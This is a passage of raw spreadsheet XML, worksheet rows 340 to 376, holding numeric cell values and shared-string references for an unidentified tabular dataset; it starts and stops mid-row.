      <c r="D340" s="6">
        <v>1</v>
      </c>
      <c r="E340" s="6">
        <v>404</v>
      </c>
      <c r="F340" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G340" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H340" s="6">
        <v>397</v>
      </c>
      <c r="I340" s="6">
        <v>0</v>
      </c>
      <c r="J340" s="6">
        <v>331</v>
      </c>
      <c r="K340" s="6">
        <v>69134</v>
      </c>
      <c r="L340" s="11"/>
      <c r="M340" s="11"/>
      <c r="N340" s="11" t="s">
        <v>800</v>
      </c>
    </row>
    <row r="341" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A341" s="3">
        <v>340</v>
      </c>
      <c r="B341" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C341" s="14" t="s">
        <v>801</v>
      </c>
      <c r="D341" s="6">
        <v>1</v>
      </c>
      <c r="E341" s="6">
        <v>404</v>
      </c>
      <c r="F341" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G341" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H341" s="6">
        <v>400</v>
      </c>
      <c r="I341" s="6">
        <v>0</v>
      </c>
      <c r="J341" s="6">
        <v>331</v>
      </c>
      <c r="K341" s="6">
        <v>69134</v>
      </c>
      <c r="L341" s="11"/>
      <c r="M341" s="11"/>
      <c r="N341" s="11" t="s">
        <v>802</v>
      </c>
    </row>
    <row r="342" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A342" s="3">
        <v>341</v>
      </c>
      <c r="B342" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C342" s="14" t="s">
        <v>803</v>
      </c>
      <c r="D342" s="6">
        <v>1</v>
      </c>
      <c r="E342" s="6">
        <v>404</v>
      </c>
      <c r="F342" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G342" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H342" s="6">
        <v>403</v>
      </c>
      <c r="I342" s="6">
        <v>0</v>
      </c>
      <c r="J342" s="6">
        <v>331</v>
      </c>
      <c r="K342" s="6">
        <v>69134</v>
      </c>
      <c r="L342" s="11"/>
      <c r="M342" s="11"/>
      <c r="N342" s="11" t="s">
        <v>804</v>
      </c>
    </row>
    <row r="343" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A343" s="3">
        <v>342</v>
      </c>
      <c r="B343" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C343" s="14" t="s">
        <v>805</v>
      </c>
      <c r="D343" s="6">
        <v>1</v>
      </c>
      <c r="E343" s="6">
        <v>404</v>
      </c>
      <c r="F343" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G343" s="6">
        <v>981</v>
      </c>
      <c r="H343" s="6">
        <v>406</v>
      </c>
      <c r="I343" s="6">
        <v>0</v>
      </c>
      <c r="J343" s="6">
        <v>331</v>
      </c>
      <c r="K343" s="6">
        <v>69134</v>
      </c>
      <c r="L343" s="11"/>
      <c r="M343" s="11"/>
      <c r="N343" s="11" t="s">
        <v>806</v>
      </c>
    </row>
    <row r="344" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A344" s="3">
        <v>343</v>
      </c>
      <c r="B344" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C344" s="14" t="s">
        <v>807</v>
      </c>
      <c r="D344" s="6">
        <v>1</v>
      </c>
      <c r="E344" s="6">
        <v>404</v>
      </c>
      <c r="F344" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G344" s="6">
        <v>925</v>
      </c>
      <c r="H344" s="6">
        <v>409</v>
      </c>
      <c r="I344" s="6">
        <v>0</v>
      </c>
      <c r="J344" s="6">
        <v>331</v>
      </c>
      <c r="K344" s="6">
        <v>69134</v>
      </c>
      <c r="L344" s="11"/>
      <c r="M344" s="11"/>
      <c r="N344" s="11" t="s">
        <v>808</v>
      </c>
    </row>
    <row r="345" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A345" s="3">
        <v>344</v>
      </c>
      <c r="B345" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C345" s="14" t="s">
        <v>810</v>
      </c>
      <c r="D345" s="6">
        <v>1</v>
      </c>
      <c r="E345" s="6">
        <v>404</v>
      </c>
      <c r="F345" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G345" s="6">
        <v>824</v>
      </c>
      <c r="H345" s="6">
        <v>412</v>
      </c>
      <c r="I345" s="6">
        <v>0</v>
      </c>
      <c r="J345" s="6">
        <v>331</v>
      </c>
      <c r="K345" s="6">
        <v>69134</v>
      </c>
      <c r="L345" s="11"/>
      <c r="M345" s="11"/>
      <c r="N345" s="11" t="s">
        <v>811</v>
      </c>
    </row>
    <row r="346" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A346" s="3">
        <v>345</v>
      </c>
      <c r="B346" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C346" s="14" t="s">
        <v>812</v>
      </c>
      <c r="D346" s="6">
        <v>1</v>
      </c>
      <c r="E346" s="6">
        <v>404</v>
      </c>
      <c r="F346" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G346" s="6">
        <v>753</v>
      </c>
      <c r="H346" s="6">
        <v>415</v>
      </c>
      <c r="I346" s="6">
        <v>0</v>
      </c>
      <c r="J346" s="6">
        <v>331</v>
      </c>
      <c r="K346" s="6">
        <v>69134</v>
      </c>
      <c r="L346" s="11"/>
      <c r="M346" s="11"/>
      <c r="N346" s="11" t="s">
        <v>813</v>
      </c>
    </row>
    <row r="347" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A347" s="3">
        <v>346</v>
      </c>
      <c r="B347" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C347" s="14" t="s">
        <v>814</v>
      </c>
      <c r="D347" s="6">
        <v>1</v>
      </c>
      <c r="E347" s="6">
        <v>404</v>
      </c>
      <c r="F347" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G347" s="6">
        <v>726</v>
      </c>
      <c r="H347" s="6">
        <v>418</v>
      </c>
      <c r="I347" s="6">
        <v>0</v>
      </c>
      <c r="J347" s="6">
        <v>331</v>
      </c>
      <c r="K347" s="6">
        <v>69134</v>
      </c>
      <c r="L347" s="11"/>
      <c r="M347" s="11"/>
      <c r="N347" s="11" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="348" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A348" s="3">
        <v>347</v>
      </c>
      <c r="B348" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C348" s="14" t="s">
        <v>816</v>
      </c>
      <c r="D348" s="6">
        <v>1</v>
      </c>
      <c r="E348" s="6">
        <v>404</v>
      </c>
      <c r="F348" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G348" s="6">
        <v>690</v>
      </c>
      <c r="H348" s="6">
        <v>421</v>
      </c>
      <c r="I348" s="6">
        <v>0</v>
      </c>
      <c r="J348" s="6">
        <v>331</v>
      </c>
      <c r="K348" s="6">
        <v>69134</v>
      </c>
      <c r="L348" s="11"/>
      <c r="M348" s="11"/>
      <c r="N348" s="11" t="s">
        <v>817</v>
      </c>
    </row>
    <row r="349" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A349" s="3">
        <v>348</v>
      </c>
      <c r="B349" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C349" s="14" t="s">
        <v>818</v>
      </c>
      <c r="D349" s="6">
        <v>1</v>
      </c>
      <c r="E349" s="6">
        <v>404</v>
      </c>
      <c r="F349" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G349" s="6">
        <v>700</v>
      </c>
      <c r="H349" s="6">
        <v>424</v>
      </c>
      <c r="I349" s="6">
        <v>0</v>
      </c>
      <c r="J349" s="6">
        <v>331</v>
      </c>
      <c r="K349" s="6">
        <v>69134</v>
      </c>
      <c r="L349" s="11"/>
      <c r="M349" s="11"/>
      <c r="N349" s="11" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="350" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A350" s="3">
        <v>349</v>
      </c>
      <c r="B350" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C350" s="14" t="s">
        <v>821</v>
      </c>
      <c r="D350" s="6">
        <v>1</v>
      </c>
      <c r="E350" s="6">
        <v>404</v>
      </c>
      <c r="F350" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G350" s="6">
        <v>680</v>
      </c>
      <c r="H350" s="6">
        <v>427</v>
      </c>
      <c r="I350" s="6">
        <v>0</v>
      </c>
      <c r="J350" s="6">
        <v>331</v>
      </c>
      <c r="K350" s="6">
        <v>69134</v>
      </c>
      <c r="L350" s="11"/>
      <c r="M350" s="11"/>
      <c r="N350" s="11" t="s">
        <v>822</v>
      </c>
    </row>
    <row r="351" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A351" s="3">
        <v>350</v>
      </c>
      <c r="B351" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C351" s="14" t="s">
        <v>823</v>
      </c>
      <c r="D351" s="6">
        <v>1</v>
      </c>
      <c r="E351" s="6">
        <v>404</v>
      </c>
      <c r="F351" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G351" s="6">
        <v>729</v>
      </c>
      <c r="H351" s="6">
        <v>430</v>
      </c>
      <c r="I351" s="6">
        <v>0</v>
      </c>
      <c r="J351" s="6">
        <v>331</v>
      </c>
      <c r="K351" s="6">
        <v>69134</v>
      </c>
      <c r="L351" s="11"/>
      <c r="M351" s="11"/>
      <c r="N351" s="11" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="352" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A352" s="3">
        <v>351</v>
      </c>
      <c r="B352" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C352" s="14" t="s">
        <v>825</v>
      </c>
      <c r="D352" s="6">
        <v>1</v>
      </c>
      <c r="E352" s="6">
        <v>404</v>
      </c>
      <c r="F352" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G352" s="6">
        <v>676</v>
      </c>
      <c r="H352" s="6">
        <v>433</v>
      </c>
      <c r="I352" s="6">
        <v>0</v>
      </c>
      <c r="J352" s="6">
        <v>331</v>
      </c>
      <c r="K352" s="6">
        <v>69134</v>
      </c>
      <c r="L352" s="11"/>
      <c r="M352" s="11"/>
      <c r="N352" s="11" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="353" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A353" s="3">
        <v>352</v>
      </c>
      <c r="B353" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C353" s="14" t="s">
        <v>827</v>
      </c>
      <c r="D353" s="6">
        <v>1</v>
      </c>
      <c r="E353" s="6">
        <v>404</v>
      </c>
      <c r="F353" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G353" s="6">
        <v>746</v>
      </c>
      <c r="H353" s="6">
        <v>362</v>
      </c>
      <c r="I353" s="6">
        <v>0</v>
      </c>
      <c r="J353" s="6">
        <v>331</v>
      </c>
      <c r="K353" s="6">
        <v>69134</v>
      </c>
      <c r="L353" s="11"/>
      <c r="M353" s="11"/>
      <c r="N353" s="11" t="s">
        <v>828</v>
      </c>
    </row>
    <row r="354" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A354" s="3">
        <v>353</v>
      </c>
      <c r="B354" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C354" s="14" t="s">
        <v>829</v>
      </c>
      <c r="D354" s="6">
        <v>1</v>
      </c>
      <c r="E354" s="6">
        <v>404</v>
      </c>
      <c r="F354" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G354" s="6">
        <v>827</v>
      </c>
      <c r="H354" s="6">
        <v>369</v>
      </c>
      <c r="I354" s="6">
        <v>0</v>
      </c>
      <c r="J354" s="6">
        <v>331</v>
      </c>
      <c r="K354" s="6">
        <v>69134</v>
      </c>
      <c r="L354" s="11"/>
      <c r="M354" s="11"/>
      <c r="N354" s="11" t="s">
        <v>830</v>
      </c>
    </row>
    <row r="355" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A355" s="3">
        <v>354</v>
      </c>
      <c r="B355" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C355" s="14" t="s">
        <v>831</v>
      </c>
      <c r="D355" s="6">
        <v>1</v>
      </c>
      <c r="E355" s="6">
        <v>503</v>
      </c>
      <c r="F355" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G355" s="6">
        <v>821</v>
      </c>
      <c r="H355" s="6">
        <v>397</v>
      </c>
      <c r="I355" s="6">
        <v>0</v>
      </c>
      <c r="J355" s="6">
        <v>399</v>
      </c>
      <c r="K355" s="6">
        <v>35</v>
      </c>
      <c r="L355" s="11"/>
      <c r="M355" s="11"/>
      <c r="N355" s="11" t="s">
        <v>832</v>
      </c>
    </row>
    <row r="356" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A356" s="3">
        <v>355</v>
      </c>
      <c r="B356" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C356" s="14" t="s">
        <v>833</v>
      </c>
      <c r="D356" s="6">
        <v>1</v>
      </c>
      <c r="E356" s="6">
        <v>503</v>
      </c>
      <c r="F356" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G356" s="6">
        <v>726</v>
      </c>
      <c r="H356" s="6">
        <v>399</v>
      </c>
      <c r="I356" s="6">
        <v>0</v>
      </c>
      <c r="J356" s="6">
        <v>399</v>
      </c>
      <c r="K356" s="6">
        <v>35</v>
      </c>
      <c r="L356" s="11"/>
      <c r="M356" s="11"/>
      <c r="N356" s="11" t="s">
        <v>834</v>
      </c>
    </row>
    <row r="357" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A357" s="3">
        <v>356</v>
      </c>
      <c r="B357" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C357" s="14" t="s">
        <v>836</v>
      </c>
      <c r="D357" s="6">
        <v>1</v>
      </c>
      <c r="E357" s="6">
        <v>503</v>
      </c>
      <c r="F357" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G357" s="6">
        <v>681</v>
      </c>
      <c r="H357" s="6">
        <v>401</v>
      </c>
      <c r="I357" s="6">
        <v>0</v>
      </c>
      <c r="J357" s="6">
        <v>399</v>
      </c>
      <c r="K357" s="6">
        <v>35</v>
      </c>
      <c r="L357" s="11"/>
      <c r="M357" s="11"/>
      <c r="N357" s="11" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="358" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A358" s="3">
        <v>357</v>
      </c>
      <c r="B358" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C358" s="14" t="s">
        <v>838</v>
      </c>
      <c r="D358" s="6">
        <v>1</v>
      </c>
      <c r="E358" s="6">
        <v>503</v>
      </c>
      <c r="F358" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G358" s="6">
        <v>624</v>
      </c>
      <c r="H358" s="6">
        <v>403</v>
      </c>
      <c r="I358" s="6">
        <v>0</v>
      </c>
      <c r="J358" s="6">
        <v>399</v>
      </c>
      <c r="K358" s="6">
        <v>35</v>
      </c>
      <c r="L358" s="11"/>
      <c r="M358" s="11"/>
      <c r="N358" s="11" t="s">
        <v>839</v>
      </c>
    </row>
    <row r="359" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A359" s="3">
        <v>358</v>
      </c>
      <c r="B359" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C359" s="14" t="s">
        <v>840</v>
      </c>
      <c r="D359" s="6">
        <v>1</v>
      </c>
      <c r="E359" s="6">
        <v>503</v>
      </c>
      <c r="F359" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G359" s="6">
        <v>473</v>
      </c>
      <c r="H359" s="6">
        <v>405</v>
      </c>
      <c r="I359" s="6">
        <v>0</v>
      </c>
      <c r="J359" s="6">
        <v>399</v>
      </c>
      <c r="K359" s="6">
        <v>35</v>
      </c>
      <c r="L359" s="11"/>
      <c r="M359" s="11"/>
      <c r="N359" s="11" t="s">
        <v>841</v>
      </c>
    </row>
    <row r="360" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A360" s="3">
        <v>359</v>
      </c>
      <c r="B360" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C360" s="14" t="s">
        <v>842</v>
      </c>
      <c r="D360" s="6">
        <v>1</v>
      </c>
      <c r="E360" s="6">
        <v>503</v>
      </c>
      <c r="F360" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G360" s="6">
        <v>462</v>
      </c>
      <c r="H360" s="6">
        <v>408</v>
      </c>
      <c r="I360" s="6">
        <v>0</v>
      </c>
      <c r="J360" s="6">
        <v>399</v>
      </c>
      <c r="K360" s="6">
        <v>35</v>
      </c>
      <c r="L360" s="11"/>
      <c r="M360" s="11"/>
      <c r="N360" s="11" t="s">
        <v>843</v>
      </c>
    </row>
    <row r="361" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A361" s="3">
        <v>360</v>
      </c>
      <c r="B361" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C361" s="14" t="s">
        <v>844</v>
      </c>
      <c r="D361" s="6">
        <v>1</v>
      </c>
      <c r="E361" s="6">
        <v>503</v>
      </c>
      <c r="F361" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G361" s="6">
        <v>449</v>
      </c>
      <c r="H361" s="6">
        <v>411</v>
      </c>
      <c r="I361" s="6">
        <v>0</v>
      </c>
      <c r="J361" s="6">
        <v>399</v>
      </c>
      <c r="K361" s="6">
        <v>35</v>
      </c>
      <c r="L361" s="11"/>
      <c r="M361" s="11"/>
      <c r="N361" s="11" t="s">
        <v>845</v>
      </c>
    </row>
    <row r="362" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A362" s="3">
        <v>361</v>
      </c>
      <c r="B362" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C362" s="14" t="s">
        <v>846</v>
      </c>
      <c r="D362" s="6">
        <v>1</v>
      </c>
      <c r="E362" s="6">
        <v>503</v>
      </c>
      <c r="F362" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G362" s="6">
        <v>461</v>
      </c>
      <c r="H362" s="6">
        <v>414</v>
      </c>
      <c r="I362" s="6">
        <v>0</v>
      </c>
      <c r="J362" s="6">
        <v>399</v>
      </c>
      <c r="K362" s="6">
        <v>35</v>
      </c>
      <c r="L362" s="11"/>
      <c r="M362" s="11"/>
      <c r="N362" s="11" t="s">
        <v>847</v>
      </c>
    </row>
    <row r="363" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A363" s="3">
        <v>362</v>
      </c>
      <c r="B363" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C363" s="14" t="s">
        <v>848</v>
      </c>
      <c r="D363" s="6">
        <v>1</v>
      </c>
      <c r="E363" s="6">
        <v>503</v>
      </c>
      <c r="F363" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G363" s="6">
        <v>443</v>
      </c>
      <c r="H363" s="6">
        <v>417</v>
      </c>
      <c r="I363" s="6">
        <v>0</v>
      </c>
      <c r="J363" s="6">
        <v>399</v>
      </c>
      <c r="K363" s="6">
        <v>35</v>
      </c>
      <c r="L363" s="11"/>
      <c r="M363" s="11"/>
      <c r="N363" s="11" t="s">
        <v>849</v>
      </c>
    </row>
    <row r="364" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A364" s="3">
        <v>363</v>
      </c>
      <c r="B364" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C364" s="14" t="s">
        <v>850</v>
      </c>
      <c r="D364" s="6">
        <v>1</v>
      </c>
      <c r="E364" s="6">
        <v>503</v>
      </c>
      <c r="F364" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G364" s="6">
        <v>456</v>
      </c>
      <c r="H364" s="6">
        <v>420</v>
      </c>
      <c r="I364" s="6">
        <v>0</v>
      </c>
      <c r="J364" s="6">
        <v>399</v>
      </c>
      <c r="K364" s="6">
        <v>35</v>
      </c>
      <c r="L364" s="11"/>
      <c r="M364" s="11"/>
      <c r="N364" s="11" t="s">
        <v>851</v>
      </c>
    </row>
    <row r="365" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A365" s="3">
        <v>364</v>
      </c>
      <c r="B365" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C365" s="14" t="s">
        <v>853</v>
      </c>
      <c r="D365" s="6">
        <v>1</v>
      </c>
      <c r="E365" s="6">
        <v>503</v>
      </c>
      <c r="F365" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G365" s="6">
        <v>521</v>
      </c>
      <c r="H365" s="6">
        <v>423</v>
      </c>
      <c r="I365" s="6">
        <v>0</v>
      </c>
      <c r="J365" s="6">
        <v>399</v>
      </c>
      <c r="K365" s="6">
        <v>35</v>
      </c>
      <c r="L365" s="11"/>
      <c r="M365" s="11"/>
      <c r="N365" s="11" t="s">
        <v>854</v>
      </c>
    </row>
    <row r="366" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A366" s="3">
        <v>365</v>
      </c>
      <c r="B366" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C366" s="14" t="s">
        <v>855</v>
      </c>
      <c r="D366" s="6">
        <v>1</v>
      </c>
      <c r="E366" s="6">
        <v>503</v>
      </c>
      <c r="F366" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G366" s="6">
        <v>556</v>
      </c>
      <c r="H366" s="6">
        <v>426</v>
      </c>
      <c r="I366" s="6">
        <v>0</v>
      </c>
      <c r="J366" s="6">
        <v>399</v>
      </c>
      <c r="K366" s="6">
        <v>35</v>
      </c>
      <c r="L366" s="11"/>
      <c r="M366" s="11"/>
      <c r="N366" s="11" t="s">
        <v>856</v>
      </c>
    </row>
    <row r="367" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A367" s="3">
        <v>366</v>
      </c>
      <c r="B367" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C367" s="14" t="s">
        <v>857</v>
      </c>
      <c r="D367" s="6">
        <v>1</v>
      </c>
      <c r="E367" s="6">
        <v>503</v>
      </c>
      <c r="F367" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G367" s="6">
        <v>539</v>
      </c>
      <c r="H367" s="6">
        <v>429</v>
      </c>
      <c r="I367" s="6">
        <v>0</v>
      </c>
      <c r="J367" s="6">
        <v>399</v>
      </c>
      <c r="K367" s="6">
        <v>35</v>
      </c>
      <c r="L367" s="11"/>
      <c r="M367" s="11"/>
      <c r="N367" s="11" t="s">
        <v>858</v>
      </c>
    </row>
    <row r="368" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A368" s="3">
        <v>367</v>
      </c>
      <c r="B368" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C368" s="14" t="s">
        <v>859</v>
      </c>
      <c r="D368" s="6">
        <v>1</v>
      </c>
      <c r="E368" s="6">
        <v>503</v>
      </c>
      <c r="F368" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G368" s="6">
        <v>554</v>
      </c>
      <c r="H368" s="6">
        <v>432</v>
      </c>
      <c r="I368" s="6">
        <v>0</v>
      </c>
      <c r="J368" s="6">
        <v>399</v>
      </c>
      <c r="K368" s="6">
        <v>35</v>
      </c>
      <c r="L368" s="11"/>
      <c r="M368" s="11"/>
      <c r="N368" s="11" t="s">
        <v>860</v>
      </c>
    </row>
    <row r="369" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A369" s="3">
        <v>368</v>
      </c>
      <c r="B369" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C369" s="14" t="s">
        <v>861</v>
      </c>
      <c r="D369" s="6">
        <v>1</v>
      </c>
      <c r="E369" s="6">
        <v>503</v>
      </c>
      <c r="F369" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G369" s="6">
        <v>539</v>
      </c>
      <c r="H369" s="6">
        <v>435</v>
      </c>
      <c r="I369" s="6">
        <v>0</v>
      </c>
      <c r="J369" s="6">
        <v>399</v>
      </c>
      <c r="K369" s="6">
        <v>35</v>
      </c>
      <c r="L369" s="11"/>
      <c r="M369" s="11"/>
      <c r="N369" s="11" t="s">
        <v>862</v>
      </c>
    </row>
    <row r="370" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A370" s="3">
        <v>369</v>
      </c>
      <c r="B370" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C370" s="14" t="s">
        <v>863</v>
      </c>
      <c r="D370" s="6">
        <v>1</v>
      </c>
      <c r="E370" s="6">
        <v>503</v>
      </c>
      <c r="F370" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G370" s="6">
        <v>450</v>
      </c>
      <c r="H370" s="6">
        <v>438</v>
      </c>
      <c r="I370" s="6">
        <v>0</v>
      </c>
      <c r="J370" s="6">
        <v>399</v>
      </c>
      <c r="K370" s="6">
        <v>35</v>
      </c>
      <c r="L370" s="11"/>
      <c r="M370" s="11"/>
      <c r="N370" s="11" t="s">
        <v>864</v>
      </c>
    </row>
    <row r="371" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A371" s="3">
        <v>370</v>
      </c>
      <c r="B371" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C371" s="14" t="s">
        <v>865</v>
      </c>
      <c r="D371" s="6">
        <v>1</v>
      </c>
      <c r="E371" s="6">
        <v>503</v>
      </c>
      <c r="F371" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G371" s="6">
        <v>427</v>
      </c>
      <c r="H371" s="6">
        <v>441</v>
      </c>
      <c r="I371" s="6">
        <v>0</v>
      </c>
      <c r="J371" s="6">
        <v>399</v>
      </c>
      <c r="K371" s="6">
        <v>35</v>
      </c>
      <c r="L371" s="11"/>
      <c r="M371" s="11"/>
      <c r="N371" s="11" t="s">
        <v>866</v>
      </c>
    </row>
    <row r="372" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A372" s="3">
        <v>371</v>
      </c>
      <c r="B372" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C372" s="14" t="s">
        <v>867</v>
      </c>
      <c r="D372" s="6">
        <v>1</v>
      </c>
      <c r="E372" s="6">
        <v>503</v>
      </c>
      <c r="F372" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G372" s="6">
        <v>425</v>
      </c>
      <c r="H372" s="6">
        <v>444</v>
      </c>
      <c r="I372" s="6">
        <v>0</v>
      </c>
      <c r="J372" s="6">
        <v>399</v>
      </c>
      <c r="K372" s="6">
        <v>35</v>
      </c>
      <c r="L372" s="11"/>
      <c r="M372" s="11"/>
      <c r="N372" s="11" t="s">
        <v>868</v>
      </c>
    </row>
    <row r="373" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A373" s="3">
        <v>372</v>
      </c>
      <c r="B373" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C373" s="14" t="s">
        <v>869</v>
      </c>
      <c r="D373" s="6">
        <v>1</v>
      </c>
      <c r="E373" s="6">
        <v>503</v>
      </c>
      <c r="F373" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G373" s="6">
        <v>427</v>
      </c>
      <c r="H373" s="6">
        <v>447</v>
      </c>
      <c r="I373" s="6">
        <v>0</v>
      </c>
      <c r="J373" s="6">
        <v>399</v>
      </c>
      <c r="K373" s="6">
        <v>35</v>
      </c>
      <c r="L373" s="11"/>
      <c r="M373" s="11"/>
      <c r="N373" s="11" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="374" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A374" s="3">
        <v>373</v>
      </c>
      <c r="B374" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C374" s="14" t="s">
        <v>871</v>
      </c>
      <c r="D374" s="6">
        <v>1</v>
      </c>
      <c r="E374" s="6">
        <v>503</v>
      </c>
      <c r="F374" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G374" s="6">
        <v>450</v>
      </c>
      <c r="H374" s="6">
        <v>450</v>
      </c>
      <c r="I374" s="6">
        <v>0</v>
      </c>
      <c r="J374" s="6">
        <v>399</v>
      </c>
      <c r="K374" s="6">
        <v>35</v>
      </c>
      <c r="L374" s="11"/>
      <c r="M374" s="11"/>
      <c r="N374" s="11" t="s">
        <v>872</v>
      </c>
    </row>
    <row r="375" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A375" s="3">
        <v>374</v>
      </c>
      <c r="B375" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C375" s="14" t="s">
        <v>874</v>
      </c>
      <c r="D375" s="6">
        <v>1</v>
      </c>
      <c r="E375" s="6">
        <v>503</v>
      </c>
      <c r="F375" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G375" s="6">
        <v>496</v>
      </c>
      <c r="H375" s="6">
        <v>453</v>
      </c>
      <c r="I375" s="6">
        <v>0</v>
      </c>
      <c r="J375" s="6">
        <v>399</v>
      </c>
      <c r="K375" s="6">
        <v>35</v>
      </c>
      <c r="L375" s="11"/>
      <c r="M375" s="11"/>
      <c r="N375" s="11" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="376" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A376" s="3">
        <v>375</v>
      </c>
      <c r="B376" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C376" s="14" t="s">
        <v>876</v>
      </c>
      <c r="D376" s="6">
        <v>1</v>
      </c>
      <c r="E376" s="6">
        <v>503</v>
      </c>
      <c r="F376" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G376" s="6">
        <v>568</v>
      </c>
      <c r="H376" s="6">
        <v>456</v>
      </c>
      <c r="I376" s="6">
        <v>0</v>
      </c>
      <c r="J376" s="6">
        <v>399</v>
      </c>
      <c r="K376" s="6">
